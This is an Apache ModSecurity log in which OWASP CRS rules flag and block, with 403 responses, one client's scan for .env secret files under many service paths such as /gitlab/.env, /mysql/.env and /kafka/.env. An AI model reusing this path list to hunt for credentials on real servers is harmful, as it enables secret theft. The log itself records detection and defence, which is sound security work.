[Mon May 11 17:23:06.242495 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN7wAAAAI"]
[Mon May 11 17:23:06.396834 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8AAAAAI"]
[Mon May 11 17:23:06.397322 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8AAAAAI"]
[Mon May 11 17:23:06.397547 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8AAAAAI"]
[Mon May 11 17:23:06.551997 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8gAAAAI"]
[Mon May 11 17:23:06.552436 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8gAAAAI"]
[Mon May 11 17:23:06.552650 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8gAAAAI"]
[Mon May 11 17:23:06.711650 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8wAAAAI"]
[Mon May 11 17:23:06.712131 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8wAAAAI"]
[Mon May 11 17:23:06.712382 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN8wAAAAI"]
[Mon May 11 17:23:06.866388 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN9AAAAAI"]
[Mon May 11 17:23:06.866883 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN9AAAAAI"]
[Mon May 11 17:23:06.867129 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agH0Wg-Qm4vhlWBPlMjN9AAAAAI"]
[Mon May 11 17:23:07.023335 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9QAAAAI"]
[Mon May 11 17:23:07.023830 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9QAAAAI"]
[Mon May 11 17:23:07.024109 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9QAAAAI"]
[Mon May 11 17:23:07.180795 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9gAAAAI"]
[Mon May 11 17:23:07.181322 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9gAAAAI"]
[Mon May 11 17:23:07.181572 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9gAAAAI"]
[Mon May 11 17:23:07.335689 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9wAAAAI"]
[Mon May 11 17:23:07.336182 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9wAAAAI"]
[Mon May 11 17:23:07.336426 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN9wAAAAI"]
[Mon May 11 17:23:07.490947 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-AAAAAI"]
[Mon May 11 17:23:07.491465 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-AAAAAI"]
[Mon May 11 17:23:07.491706 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-AAAAAI"]
[Mon May 11 17:23:07.645916 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-gAAAAI"]
[Mon May 11 17:23:07.646430 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-gAAAAI"]
[Mon May 11 17:23:07.646692 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-gAAAAI"]
[Mon May 11 17:23:07.801117 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-wAAAAI"]
[Mon May 11 17:23:07.801665 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-wAAAAI"]
[Mon May 11 17:23:07.801928 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN-wAAAAI"]
[Mon May 11 17:23:07.960661 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN_AAAAAI"]
[Mon May 11 17:23:07.961147 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN_AAAAAI"]
[Mon May 11 17:23:07.961401 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agH0Ww-Qm4vhlWBPlMjN_AAAAAI"]
[Mon May 11 17:23:08.116919 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_QAAAAI"]
[Mon May 11 17:23:08.117431 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_QAAAAI"]
[Mon May 11 17:23:08.117661 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_QAAAAI"]
[Mon May 11 17:23:08.274669 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_gAAAAI"]
[Mon May 11 17:23:08.275180 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_gAAAAI"]
